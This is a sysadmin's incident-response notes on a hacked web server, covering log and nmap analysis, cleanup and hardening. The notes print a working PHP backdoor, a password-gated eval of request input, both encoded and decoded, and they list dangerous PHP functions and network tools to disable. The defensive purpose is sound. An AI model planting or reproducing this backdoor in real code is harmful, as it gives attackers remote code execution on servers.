Search procedure

• Log analysis (/var/log)
• Identification of a backdoor (compat.php)
• Code analysis
  • Authenticated access with an encoded MD5 password
  • Backdoor code was inside function gzinflate(base64_decode(*)) inside the "compat.php" file
  • Backdoor analysis (decoding with http://www.decoder-online.com)
  • MD5 password : ff6cb56b876eedf90b5bca2c0a210f91
• Nmap analysis from outside :

 Not shown: 999 open|filtered ports, 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.2 80/tcp open http Apache httpd 2.2.8 ((Unix) PHP/5.2.5) |_http-favicon: Unknown favicon MD5: 3AD8FECBDE088AF038C26EE5A5F40D5B | http-methods: GET HEAD POST OPTIONS TRACE | Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Site doesn't have a title (text/html). 8080/tcp closed http-proxy 4672/udp closed rfa 

• SSH Logs analysis (/var/log/secure)
  
  • Detection of locations with : http://www.iplocation.net/index.php

The backdoor

Was giving a total access on th server with a list of known exploits, system access and the list of disabled functions under PHP. So we could say that our hacker was very nice, he could have made a lot of damages if he wanted... Much more than changing our website with "viagra" ads.

Inside  /var/www :

grep -R * -e 'gzipinflate(base64' 

This command gave me 6 files that was compromised with a copy of the backdoor.

System side

Very old OS version with no updates at all

Very old version of apache web server : 2.0.52 (24 mai 2006)

Application side

Old version of spip, I think the hacker used a common exploit under SPIP to hack the server.

Some basic tasks to detect common things

Use a RootKit detection software like chkrootkit

Web Shell Detector ( https://github.com/emposha/PHP-Shell-Detector)

• Several malicious code discovered
• Code base 64 encoded :

eval(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkgPT0gJzc0MjUzYjUxNjIzNmI1ZmZiZTM1NzFlM2I5MTNiMzZhJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29kZSddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ==')); 

Which translates to :

 if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '74253b516236b5ffbe3571e3b913b36a') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } 

Interesting information about this type of code :

http://aw-snap.info/articles/backdoor-examples.php

Emergency action plan

• Block FTP access and just permits 80 or 443 port to the final Web server
• Block IP from suspicious places
• Do a grep search (base64_decode and gzip_inflate) on all the filesystem of the server and remove dangerous script and code
• Then reinstall the server (unique solution to be sure everything is ok again)
  • With a recent version of apache (with automatic updates)
  • WIth a recent kernel
  • If really necessary : ftps (or sftp) access with chroot with a strong policy concerning passwords
  • With automatic backup of DocumentRoot on svn (easier to see differences if necessary)
• Remove system commands that are "dangerous" with yum remove or rm for make :
  • gcc, make, nc
• Disable PHP functions like "eval" inside php.ini:
  • disable_functions=exec,eval,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

New architecture

• Reverse proxy installation with Apache or Nginx in DMZ
• FInal apache server with mod_security and/or mod_evasive
• FTP access inside a reverse proxy with Pydio (formerly ajaxplorer) under SSL

Linux Malware Detect

chmod +x install.php 
./install.php 
maldet -u 
maldet -p 
maldet -a /var/www/ 
maldet --report 
maldet --clean 100713-1111.16205 

Cron planification of maldet with email in case of Rootkit or Web Shell detection